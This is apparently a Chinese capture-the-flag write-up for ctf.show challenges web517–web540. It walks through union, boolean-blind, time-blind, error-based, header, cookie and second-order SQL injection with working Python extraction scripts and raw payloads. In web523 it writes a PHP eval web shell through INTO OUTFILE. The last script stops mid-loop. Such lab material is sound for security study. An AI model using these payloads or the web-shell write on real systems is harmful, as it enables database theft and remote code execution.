web517

union注入,使用'闭合

import requests
import re

def find_flag(text):
    """Print the first ctfshow{...} token found in *text*.

    The token body is 36 characters of [0-9a-z-] (presumably a UUID).
    Raises IndexError when no token is present: the first match is
    indexed without a check, exactly as in the original.
    """
    token_pattern = "ctfshow{[0-9a-z-]{36}}"
    matches = re.findall(token_pattern, text)
    first_match = matches[0]
    print(first_match)


def send_request(params):
    """GET the challenge URL with *params* as the query string; return the body text.

    Every request is routed through a local HTTP proxy on 127.0.0.1:8080
    (presumably an intercepting proxy used to read the responses — TODO
    confirm) and carries a form Content-Type header although it is a GET.
    """
    target = 'http://7409729e-2d15-40b9-8c92-c96092d2a608.challenge.ctf.show/'
    proxy_map = {"http": "http://127.0.0.1:8080"}
    extra_headers = {"Content-Type": "application/x-www-form-urlencoded"}

    response = requests.get(
        url=target,
        params=params,
        headers=extra_headers,
        proxies=proxy_map,
    )
    return response.text

# Step 1: UNION probe with three constant columns. The body is fetched but
# not inspected here; `resp` is overwritten by each later call, so the
# intermediate responses are presumably read in the proxy — TODO confirm.
params1 = {
    "id":"-1' union select 1,2,3-- "
}

resp = send_request(params1)

# list all schema names
params2 = {
    "id":"-1' union select 1,(select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA),3-- "
}

resp = send_request(params2)

# list the tables of the ctfshow schema
params3 = {
    "id":"-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),3-- "
}

resp = send_request(params3)

# list the columns of the flag table
params4 = {
    "id":"-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flag'),3-- "
}

resp = send_request(params4)

# read the flag column
params5 = {
    "id":"-1' union select 1,(select group_concat(flag) from ctfshow.flag),3-- "
}

resp = send_request(params5)

# only the last response is parsed; find_flag raises IndexError when no
# ctfshow{...} token is in it
find_flag(resp)

web518

布尔注入,不需要闭合

import requests
import re

def find_flag(text):
    """Print the first ctfshow{...} token found in *text*.

    The token body is 36 characters of [0-9a-z-] (presumably a UUID).
    Raises IndexError when no token is present: the first match is
    indexed without a check, exactly as in the original.
    """
    token_pattern = "ctfshow{[0-9a-z-]{36}}"
    matches = re.findall(token_pattern, text)
    first_match = matches[0]
    print(first_match)


def send_request(params):
    """GET the challenge URL with *params* as the query string; return the body text.

    Every request is routed through a local HTTP proxy on 127.0.0.1:8080
    (presumably an intercepting proxy used to read the responses — TODO
    confirm) and carries a form Content-Type header although it is a GET.
    """
    target = 'http://0023f82a-87bb-4405-9718-f612b60ea29c.challenge.ctf.show/'
    proxy_map = {"http": "http://127.0.0.1:8080"}
    extra_headers = {"Content-Type": "application/x-www-form-urlencoded"}

    response = requests.get(
        url=target,
        params=params,
        headers=extra_headers,
        proxies=proxy_map,
    )
    return response.text

# Step 1: UNION probe with three constant columns (numeric context, so no
# quote is closed). The body is fetched but not inspected here; `resp` is
# overwritten by each later call, so the intermediate responses are
# presumably read in the proxy — TODO confirm.
params1 = {
    "id":"-1 union select 1,2,3-- "
}

resp = send_request(params1)

# list all schema names
params2 = {
    "id":"-1 union select 1,(select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA),3-- "
}

resp = send_request(params2)

# list the tables of the ctfshow schema
params3 = {
    "id":"-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),3-- "
}

resp = send_request(params3)

# list the columns of the flagaa table
params4 = {
    "id":"-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flagaa'),3-- "
}

resp = send_request(params4)

# read the flagac column
params5 = {
    "id":"-1 union select 1,(select group_concat(flagac) from ctfshow.flagaa),3-- "
}

resp = send_request(params5)

# only the last response is parsed; find_flag raises IndexError when no
# ctfshow{...} token is in it
find_flag(resp)

web519

union注入,使用')闭合

import requests
import re

def find_flag(text):
    """Print the first ctfshow{...} token found in *text*.

    The token body is 36 characters of [0-9a-z-] (presumably a UUID).
    Raises IndexError when no token is present: the first match is
    indexed without a check, exactly as in the original.
    """
    token_pattern = "ctfshow{[0-9a-z-]{36}}"
    matches = re.findall(token_pattern, text)
    first_match = matches[0]
    print(first_match)


def send_request(params):
    """GET the challenge URL with *params* as the query string; return the body text.

    Every request is routed through a local HTTP proxy on 127.0.0.1:8080
    (presumably an intercepting proxy used to read the responses — TODO
    confirm) and carries a form Content-Type header although it is a GET.
    """
    target = 'http://2da78177-bddf-46d6-a6af-1db26a56d066.challenge.ctf.show/'
    proxy_map = {"http": "http://127.0.0.1:8080"}
    extra_headers = {"Content-Type": "application/x-www-form-urlencoded"}

    response = requests.get(
        url=target,
        params=params,
        headers=extra_headers,
        proxies=proxy_map,
    )
    return response.text

# Step 1: UNION probe with three constant columns, closing a ('...') context.
# The body is fetched but not inspected here; `resp` is overwritten by each
# later call, so the intermediate responses are presumably read in the
# proxy — TODO confirm.
params1 = {
    "id":"-1') union select 1,2,3-- "
}

resp = send_request(params1)

# list all schema names
params2 = {
    "id":"-1') union select 1,(select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA),3-- "
}

resp = send_request(params2)

# list the tables of the ctfshow schema
params3 = {
    "id":"-1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),3-- "
}

resp = send_request(params3)

# list the columns of the flagaanec table
params4 = {
    "id":"-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flagaanec'),3-- "
}

resp = send_request(params4)

# read the flagaca column
params5 = {
    "id":"-1') union select 1,(select group_concat(flagaca) from ctfshow.flagaanec),3-- "
}

resp = send_request(params5)

# only the last response is parsed; find_flag raises IndexError when no
# ctfshow{...} token is in it
find_flag(resp)

web520

union注入,使用")闭合

import requests
import re

def find_flag(text):
    """Print the first ctfshow{...} token found in *text*.

    The token body is 36 characters of [0-9a-z-] (presumably a UUID).
    Raises IndexError when no token is present: the first match is
    indexed without a check, exactly as in the original.
    """
    token_pattern = "ctfshow{[0-9a-z-]{36}}"
    matches = re.findall(token_pattern, text)
    first_match = matches[0]
    print(first_match)


def send_request(params):
    """GET the challenge URL with *params* as the query string; return the body text.

    Every request is routed through a local HTTP proxy on 127.0.0.1:8080
    (presumably an intercepting proxy used to read the responses — TODO
    confirm) and carries a form Content-Type header although it is a GET.
    """
    target = 'http://e1bf823f-4a25-4396-99cb-7ad61e90086d.challenge.ctf.show/'
    proxy_map = {"http": "http://127.0.0.1:8080"}
    extra_headers = {"Content-Type": "application/x-www-form-urlencoded"}

    response = requests.get(
        url=target,
        params=params,
        headers=extra_headers,
        proxies=proxy_map,
    )
    return response.text

# Step 1: UNION probe with three constant columns, closing a ("...") context.
# The body is fetched but not inspected here; `resp` is overwritten by each
# later call, so the intermediate responses are presumably read in the
# proxy — TODO confirm.
params1 = {
    "id":"-1\") union select 1,2,3-- "
}

resp = send_request(params1)

# list all schema names
params2 = {
    "id":"-1\") union select 1,(select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA),3-- "
}

resp = send_request(params2)

# list the tables of the ctfshow schema
params3 = {
    "id":"-1\") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),3-- "
}

resp = send_request(params3)

# list the columns of the flagsf table
params4 = {
    "id":"-1\") union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flagsf'),3-- "
}

resp = send_request(params4)

# read the flag23 column
params5 = {
    "id":"-1\") union select 1,(select group_concat(flag23) from ctfshow.flagsf),3-- "
}

resp = send_request(params5)

# only the last response is parsed; find_flag raises IndexError when no
# ctfshow{...} token is in it
find_flag(resp)

web521

布尔注入,使用'闭合

import requests

# Query prefix: the id value is closed with a single quote and the boolean
# payload built below is appended to it as raw text.
url = "http://6f1c2196-49fe-4141-bdbc-7120d82154b3.challenge.ctf.show/?id=1'and "

result = ''  # characters recovered so far, in order
i = 0  # 1-based substr() position; incremented once per outer iteration

# every request goes through a local proxy on 127.0.0.1:8080 (presumably an
# intercepting proxy used to watch the traffic — TODO confirm)
proxies = {
    "http":"http://127.0.0.1:8080"
}
while True:
    i = i + 1
    # binary search over the printable-ASCII window [32, 127) for the code
    # of character i
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # earlier stages, kept for reference: table names, then column names
        # payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow")),{i},1))>{mid},1,0)%23'
        # payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema="ctfshow")),{i},1))>{mid},1,0)%23'
        payload = f'if(ascii(substr((select group_concat(flag33) from ctfshow.flagpuck),{i},1))>{mid},1,0)%23'

        r = requests.get(url + payload,proxies=proxies)
        # boolean oracle: the marker string in the response is taken to mean
        # the injected condition ascii(...) > mid held, so search upward
        if "You are in..........." in r.text:
            head = mid + 1
        else:
            tail = mid

    # head converges on the exact code. It stays at 32 when the comparison
    # never held, which is read as "no character at position i" — note that
    # a real space (code 32) is indistinguishable from that and also stops
    # the loop.
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)  # progress after every recovered character

web522

布尔注入,使用"闭合

import requests

# Query prefix: the id value is closed with a double quote and the boolean
# payload built below is appended to it as raw text.
url = "http://5adfc251-2ed4-4f73-8de4-287eda414c6e.challenge.ctf.show/?id=1\" and "

result = ''  # characters recovered so far, in order
i = 0  # 1-based substr() position; incremented once per outer iteration

# every request goes through a local proxy on 127.0.0.1:8080 (presumably an
# intercepting proxy used to watch the traffic — TODO confirm)
proxies = {
    "http":"http://127.0.0.1:8080"
}
while True:
    i = i + 1
    # binary search over the printable-ASCII window [32, 127) for the code
    # of character i
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # earlier stages, kept for reference: table names, then column names
        # payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow" ),{i},1))>{mid},1,0)%23'
        # payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema="ctfshow"),{i},1))>{mid},1,0)%23'
        payload = f'if(ascii(substr((select group_concat(flag3a3) from ctfshow.flagpa),{i},1))>{mid},1,0)%23'

        r = requests.get(url + payload,proxies=proxies)
        # boolean oracle: the marker string in the response is taken to mean
        # the injected condition ascii(...) > mid held, so search upward
        if "You are in..........." in r.text:
            head = mid + 1
        else:
            tail = mid

    # head converges on the exact code. It stays at 32 when the comparison
    # never held, which is read as "no character at position i" — a real
    # space (code 32) is indistinguishable from that and also stops the loop.
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)  # progress after every recovered character

web523

?id=1%27))%20union%20select%20NULL,0x3c3f70687020406576616c28245f504f53545b315d293f3e,NULL%20into%20outfile%20"/var/www/html/1.php"%23

使用into outfile写入shell

<?php @eval($_POST[1])?>
0x3c3f70687020406576616c28245f504f53545b315d293f3e

web524

时间盲注,使用'闭合。

import requests

# Query prefix (note the doubled slash before "?"): the id value is closed
# with a URL-encoded single quote and the timing payload is appended as text.
url = "http://c2e9c750-261e-41b2-b8eb-f2306b836355.challenge.ctf.show//?id=1%27and%20"

result = ''  # characters recovered so far, in order
i = 0  # 1-based substr() position; incremented once per outer iteration

# every request goes through a local proxy on 127.0.0.1:8080 (presumably an
# intercepting proxy used to watch the traffic — TODO confirm)
proxies = {
    "http":"http://127.0.0.1:8080"
}

while True:
    i = i + 1
    # binary search over the printable-ASCII window [32, 127) for the code
    # of character i
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # earlier stages, kept for reference: table names, then column names
        # payload = f'if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema="ctfshow")),{i},1))>{mid},sleep(1.5),0)%23'
        # payload = f'if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_schema="ctfshow")),{i},1))>{mid},sleep(0.7),0)%23'
        payload = f'if(ascii(substr((select/**/group_concat(flag423)from(ctfshow.flagjugg)),{i},1))>{mid},sleep(0.6),0)%23'


        # timing oracle: a reply within the 0.5 s timeout means sleep(0.6)
        # did not run (condition false). Any exception is read as "condition
        # true" — the except is bare, so a connection error or a slow network
        # is misread the same way as the timeout.
        try:
            r = requests.get(url + payload,proxies=proxies, timeout=0.5)
            tail = mid
        except:
            head = mid + 1


    # head stays at 32 when the comparison never held, which is read as
    # "no character at position i"; a real space (code 32) also stops it
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)  # progress after every recovered character

web525

时间盲注,使用'闭合

import requests

# Query prefix (note the doubled slash before "?"): the id value is closed
# with a URL-encoded single quote and the timing payload is appended as text.
url = "http://56ab9933-1353-496e-83ee-3fc733ae8df8.challenge.ctf.show//?id=1%27and%20"

result = ''  # characters recovered so far, in order
i = 0  # 1-based substr() position; incremented once per outer iteration

# every request goes through a local proxy on 127.0.0.1:8080 (presumably an
# intercepting proxy used to watch the traffic — TODO confirm)
proxies = {
    "http":"http://127.0.0.1:8080"
}

while True:
    i = i + 1
    # binary search over the printable-ASCII window [32, 127) for the code
    # of character i
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # earlier stages, kept for reference: table names, then column names
        # payload = f'if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema="ctfshow")),{i},1))>{mid},sleep(1.5),0)%23'
        # payload = f'if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_schema="ctfshow")),{i},1))>{mid},sleep(0.7),0)%23'
        payload = f'if(ascii(substr((select/**/group_concat(flag4a23)from(ctfshow.flagug)),{i},1))>{mid},sleep(0.6),0)%23'


        # timing oracle: a reply within the 0.5 s timeout means sleep(0.6)
        # did not run (condition false). Any exception is read as "condition
        # true" — the except is bare, so a connection error or a slow network
        # is misread the same way as the timeout.
        try:
            r = requests.get(url + payload,proxies=proxies, timeout=0.5)
            tail = mid
        except:
            head = mid + 1


    # head stays at 32 when the comparison never held, which is read as
    # "no character at position i"; a real space (code 32) also stops it
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)  # progress after every recovered character

web526

时间盲注,使用"闭合。

import requests

# Query prefix: the id value is closed with a double quote and the timing
# payload is appended as text. No proxy is configured for this one.
url = "http://f2b55919-bcd4-4a5f-bec2-d835aee7be4a.challenge.ctf.show/?id=1\"and%20"

result = ''  # characters recovered so far, in order
i = 7  # starts at character 8 — presumably resuming an earlier partial run; TODO confirm

while True:
    i = i + 1
    # binary search over the printable-ASCII window [32, 127) for the code
    # of character i
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # payload = f'if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema="ctfshow")),{i},1))>{mid},sleep(1.1),0)%23'
        # dead assignment: the next line overwrites it before any use, so
        # the column_name query is never sent
        payload = f'if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_schema="ctfshow")),{i},1))>{mid},sleep(1.1),0)%23'
        payload = f'if(ascii(substr((select/**/group_concat(flag43s)from(ctfshow.flagugs)),{i},1))>{mid},sleep(1.1),0)%23'

        # timing oracle: a reply within the 1 s timeout means sleep(1.1) did
        # not run (condition false). Any exception is read as "condition
        # true" — the except is bare, so a connection error is misread the
        # same way as the timeout.
        try:
            r = requests.get(url + payload,timeout=1)
            tail = mid
        except:
            head = mid + 1


    # head stays at 32 when the comparison never held, which is read as
    # "no character at position i"; a real space (code 32) also stops it
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)  # progress after every recovered character

web527

'闭合

passwd=1&uname=-1'union select 1,group_concat(table_name) from information_schema.tables where table_schema="ctfshow"#
passwd=1&uname=-1'union select 1,group_concat(column_name) from information_schema.columns where table_schema="ctfshow"#
passwd=1&uname=-1'union select 1,group_concat(flag43s) from ctfshow.flagugsd#

web528

")闭合

passwd=1&uname=-1")union select 1,group_concat(table_name) from information_schema.tables where table_schema="ctfshow"#
passwd=1&uname=-1")union select 1,group_concat(column_name) from information_schema.columns where table_schema="ctfshow"#
passwd=1&uname=-1")union select 1,group_concat(flag43as
) from ctfshow.flagugsds#

web529

')闭合
没有回显,使用报错注入updatexml

passwd=1&uname=-1') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="ctfshow")),0)#
passwd=1&uname=-1') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="ctfshow")),0)#
passwd=1&uname=-1') and updatexml(1,concat(0x7e,(select flag4 from ctfshow.flag)),0)#
passwd=1&uname=-1') and updatexml(1,concat(0x7e,(select right(flag4,20) from ctfshow.flag)),0)#

web530

"闭合
没有回显,使用报错注入updatexml

passwd=1&uname=-1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="ctfshow")),0)#
passwd=1&uname=-1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="ctfshow")),0)#
passwd=1&uname=-1" and updatexml(1,concat(0x7e,(select flag4s from ctfshow.flagb)),0)#
passwd=1&uname=-1" and updatexml(1,concat(0x7e,(select right(flag4s,20) from ctfshow.flagb)),0)#

web531

'闭合
没有回显及报错信息,使用布尔盲注。

import requests

url = "http://da743c68-9836-40dd-af7d-2260c9256357.challenge.ctf.show/"

result = ''  # characters recovered so far, in order
i = 0  # 1-based substr() position; incremented once per outer iteration

# every request goes through a local proxy on 127.0.0.1:8080 (presumably an
# intercepting proxy used to watch the traffic — TODO confirm)
proxy = {
    "http":"http://127.0.0.1:8080"
}
while True:
    i = i + 1
    # binary search over the printable-ASCII window [32, 127) for the code
    # of character i
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # earlier stages, kept for reference: schema names, then table
        # names, then column names — each ran through this same loop
        # payload ={
        #     "uname":f"-1' or if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},1,0)#",
        #     "passwd":"123",
        #     "submit":"Submit"
        # }
        # payload ={
        #     "uname":f"-1' or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{i},1))>{mid},1,0)#",
        #     "passwd":"123",
        #     "submit":"Submit"
        # }
        # payload ={
        #     "uname":f"-1' or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow'),{i},1))>{mid},1,0)#",
        #     "passwd":"123",
        #     "submit":"Submit"
        # }
        # form fields of the login POST; the condition rides in "uname"
        payload ={
            "uname":f"-1' or if(ascii(substr((select group_concat(flag4sa) from ctfshow.flagba),{i},1))>{mid},1,0)#",
            "passwd":"123",
            "submit":"Submit"
        }
        # payload = 

        r = requests.post(url=url, data=payload,proxies=proxy)
        # boolean oracle: 'flag.jpg' in the response is taken to mean the
        # injected condition ascii(...) > mid held, so search upward
        if 'flag.jpg' in r.text:
            head = mid + 1
        else:
            tail = mid
    # head stays at 32 when the comparison never held, which is read as
    # "no character at position i"; a real space (code 32) also stops it
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)  # progress after every recovered character

web532

")闭合
没有回显及报错信息,使用布尔盲注。

import requests

url = "http://7e9bdf22-362a-4365-81e7-804e55517648.challenge.ctf.show/"

result = ''  # characters recovered so far, in order
i = 0  # 1-based substr() position; incremented once per outer iteration

# every request goes through a local proxy on 127.0.0.1:8080 (presumably an
# intercepting proxy used to watch the traffic — TODO confirm)
proxy = {
    "http":"http://127.0.0.1:8080"
}
while True:
    i = i + 1
    # binary search over the printable-ASCII window [32, 127) for the code
    # of character i
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # earlier stages, kept for reference: schema names, then table
        # names, then column names — each ran through this same loop
        # payload ={
        #     "uname":f"-1\") or if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},1,0)#",
        #     "passwd":"123",
        #     "submit":"Submit"
        # }
        # payload ={
        #     "uname":f"-1\") or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{i},1))>{mid},1,0)#",
        #     "passwd":"123",
        #     "submit":"Submit"
        # }
        # payload ={
        #     "uname":f"-1\") or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow'),{i},1))>{mid},1,0)#",
        #     "passwd":"123",
        #     "submit":"Submit"
        # }
        # form fields of the login POST; the condition rides in "uname",
        # closing a ("...") context
        payload ={
            "uname":f"-1\") or if(ascii(substr((select group_concat(flag4sa) from ctfshow.flagbab),{i},1))>{mid},1,0)#",
            "passwd":"123",
            "submit":"Submit"
        }
        # payload = 

        r = requests.post(url=url, data=payload,proxies=proxy)
        # boolean oracle: 'flag.jpg' in the response is taken to mean the
        # injected condition ascii(...) > mid held, so search upward
        if 'flag.jpg' in r.text:
            head = mid + 1
        else:
            tail = mid
    # head stays at 32 when the comparison never held, which is read as
    # "no character at position i"; a real space (code 32) also stops it
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)  # progress after every recovered character

web533

'闭合,update型报错注入

uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),0x7e),1)#
uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='ctfshow'),0x7e),1)#
uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select flag4 from ctfshow.flag),0x7e),1)#
uname=admin&passwd=123' and updatexml(1,concat(0x7e,right((select flag4 from ctfshow.flag),20),0x7e),1)#

web534

使用账号admin/admin登录,会显示UA头及IP Referer地址
UA头注入
这里无法使用注释符,使用引号闭合后面的引号。

后端源码:

<?php
// Fragment of the challenge backend (legacy mysql_* API). $uagent (the request
// User-Agent), $IP and $uname are interpolated into the INSERT without escaping
// — the User-Agent is the request-controlled injection point — and the raw
// driver error is echoed afterwards, which is what makes error-based extraction
// (updatexml) observable. A prepared statement plus not echoing mysql_error()
// would close both.
 $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_query($insert);
print_r(mysql_error());	
User-Agent: 'and updatexml(1,concat(0x3d,(select group_concat(schema_name) from information_schema.schemata)),1) and'
User-Agent: 'and updatexml(1,concat(0x3d,(select group_concat(table_name) from information_schema.tables where table_schema="ctfshow")),1) and'
User-Agent: 'and updatexml(1,concat(0x3d,(select group_concat(column_name) from information_schema.columns where table_schema="ctfshow")),1) and'
User-Agent: 'and updatexml(1,concat(0x3d,(select group_concat(flag4) from ctfshow.flag)),1) and'
User-Agent: 'and updatexml(1,concat(0x3d,(select right(flag4,20) from ctfshow.flag)),1) and'

web535

使用账号admin/admin登录,会显示IP Referer地址
Referer头注入
这里无法使用注释符,使用引号闭合后面的引号。

后端源码:

<?php
// Fragment of the challenge backend (legacy mysql_* API). The Referer header is
// read into $uagent and, together with the client address, interpolated into
// the INSERT without escaping; the raw driver error is echoed afterwards, which
// is what makes error-based extraction observable. A prepared statement plus
// not echoing mysql_error() would close both.
$uagent = $_SERVER['HTTP_REFERER'];
$IP = $_SERVER['REMOTE_ADDR'];
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
mysql_query($insert);
print_r(mysql_error());
Referer: 'and updatexml(1,concat(0x3d,(select group_concat(schema_name) from information_schema.schemata)),1) and'
Referer: 'and updatexml(1,concat(0x3d,(select group_concat(table_name) from information_schema.tables where table_schema="ctfshow")),1) and'
Referer: 'and updatexml(1,concat(0x3d,(select group_concat(column_name) from information_schema.columns where table_schema="ctfshow")),1) and'
Referer: 'and updatexml(1,concat(0x3d,(select group_concat(flag4) from ctfshow.flag)),1) and'
Referer: 'and updatexml(1,concat(0x3d,(select right(flag4,20) from ctfshow.flag)),1) and'

web536

使用账号admin/admin登录,会显示Cookie值
Cookie头注入

后台源码:

<?php
// Fragment of the challenge backend (legacy mysql_* API). $cookee — the uname
// cookie, per the writeup — is interpolated unescaped into the WHERE clause,
// and a failing query dies with the raw driver error: the two properties the
// error-based payloads in the writeup rely on. Same statements as the original
// listing; only the layout differs.
$sql = "SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
$result = mysql_query($sql);
if (!$result) {
    die('Issue with your mysql: ' . mysql_error());
}
Cookie: uname='and updatexml(1,concat(0x3d,(select group_concat(schema_name) from information_schema.schemata)),1)#
Cookie:uname='and updatexml(1,concat(0x3d,(select group_concat(table_name) from information_schema.tables where table_schema="ctfshow")),1)#
Cookie:uname='and updatexml(1,concat(0x3d,(select group_concat(column_name) from information_schema.columns where table_schema="ctfshow")),1)#
Cookie:uname='and updatexml(1,concat(0x3d,(select group_concat(flag4) from ctfshow.flag)),1)#
Cookie:uname='and updatexml(1,concat(0x3d,(select right(flag4,20) from ctfshow.flag)),1)#

web537

')闭合
使用账号admin/admin登录,会显示base64编码的Cookie值
Cookie头注入

后端源码:

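<?php
// Fragment of the challenge backend (legacy mysql_* API). The original listing
// opened with "<?php>", which is not a valid open tag; corrected to "<?php".
// base64_decode() is a transport encoding, not sanitisation: the decoded cookie
// value goes into the WHERE clause unescaped, and a failing query dies with the
// raw driver error, which is what the error-based payloads in the writeup rely
// on. A prepared statement plus not echoing mysql_error() would close both.
$cookee = base64_decode($cookee);
echo "<br></font>";
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
$result=mysql_query($sql);
if (!$result)
    {
    die('Issue with your mysql: ' . mysql_error());
    }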

Cookie: uname=JylhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4M2QsKHNlbGVjdCBncm91cF9jb25jYXQoc2NoZW1hX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnNjaGVtYXRhKSksMSkj
Cookie:uname=JylhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4M2QsKHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0iY3Rmc2hvdyIpKSwxKSM=
Cookie:uname=JylhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4M2QsKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPSJjdGZzaG93IikpLDEpIw==
Cookie:uname=JylhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4M2QsKHNlbGVjdCBncm91cF9jb25jYXQoZmxhZzQpIGZyb20gY3Rmc2hvdy5mbGFnKSksMSkj
Cookie:uname=JylhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4M2QsKHNlbGVjdCByaWdodChmbGFnNCwyMCkgZnJvbSBjdGZzaG93LmZsYWcpKSwxKSM=

web538

"闭合,其他和上题相同

Cookie: uname=ImFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHgzZCwoc2VsZWN0IHJpZ2h0KGZsYWc0LDIwKSBmcm9tIGN0ZnNob3cuZmxhZykpLDEpIw==
Cookie: uname=ImFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHgzZCwoc2VsZWN0IGdyb3VwX2NvbmNhdChmbGFnNCkgZnJvbSBjdGZzaG93LmZsYWcpKSwxKSM=

web539

过滤了注释符的报错注入。

后端源码:

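<?php
// Fragment of the challenge backend (legacy mysql_* API). A single,
// non-recursive pass removes every '#' and every "--" from $id; quotes are
// left alone and $id is then interpolated straight into the query, and the
// raw driver error is printed on failure. That is why the writeup's payloads
// close the injected string with a trailing quote rather than a comment.
// Stripping comment markers is not a defence; a prepared statement is.
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id); // the ';' was missing in the original listing

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
    echo '<font color= "#0000ff">';
    echo 'Your Login name:'. $row['username'];
    echo "<br>";
    echo 'Your Password:' .$row['password'];
    echo "</font>";
}
else
{
    echo '<font color= "#FFFF00">';
    print_r(mysql_error());  // raw driver error reaches the page
    echo "</font>";
}
} // (sic) closes a block that begins outside this listing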
id='and updatexml(1,concat(0x3d,(select group_concat(schema_name) from information_schema.schemata)),1) and'
id='and updatexml(1,concat(0x3d,(select group_concat(table_name) from information_schema.tables where table_schema="ctfshow")),1) and'
id='and updatexml(1,concat(0x3d,(select group_concat(column_name) from information_schema.columns where table_schema="ctfshow")),1) and'
id='and updatexml(1,concat(0x3d,(select group_concat(flag4) from ctfshow.flag)),1) and'
id='and updatexml(1,concat(0x3d,(select right(flag4,20) from ctfshow.flag)),1) and'

web540

后台源码:
pass_change.php

<?php
// pass_change.php fragment (legacy mysql_* API). The three POST fields are
// passed through mysql_real_escape_string(), but $username comes from the
// session and is interpolated into the UPDATE as-is — the value the writeup
// identifies as the second-order injection point. Same statements as the
// original listing; only layout and comments differ.
$username = $_SESSION["username"];
$curr_pass = mysql_real_escape_string($_POST['current_password']);
$pass = mysql_real_escape_string($_POST['password']);
$re_pass = mysql_real_escape_string($_POST['re_password']);

if ($pass == $re_pass) {
    $sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
    $res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
    $row = mysql_affected_rows();
    echo '<font size="3" color="#FFFF00">';
    echo '<center>';
    if ($row == 1) {
        echo "Password successfully updated";
    } else {
        header('Location: failed.php');
        //echo 'You tried to be smart, Try harder!!!! :( ';
    }
}

可以看到只有$_SESSION["username"]没有被过滤,我们注册账号可以控制值,二次注入。

使用时间盲注,编写脚本(copy from Y4)

import requests
session = requests.session()  # one cookie jar, so the login at url2 carries over to url3

result = ''  # characters recovered so far, in order
i = 0  # 1-based substr() position; incremented once per outer iteration

while True:
    i = i + 1
    # binary search over the printable-ASCII window [32, 127) for the code
    # of character i
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # earlier stages, kept for reference: table names, then column names
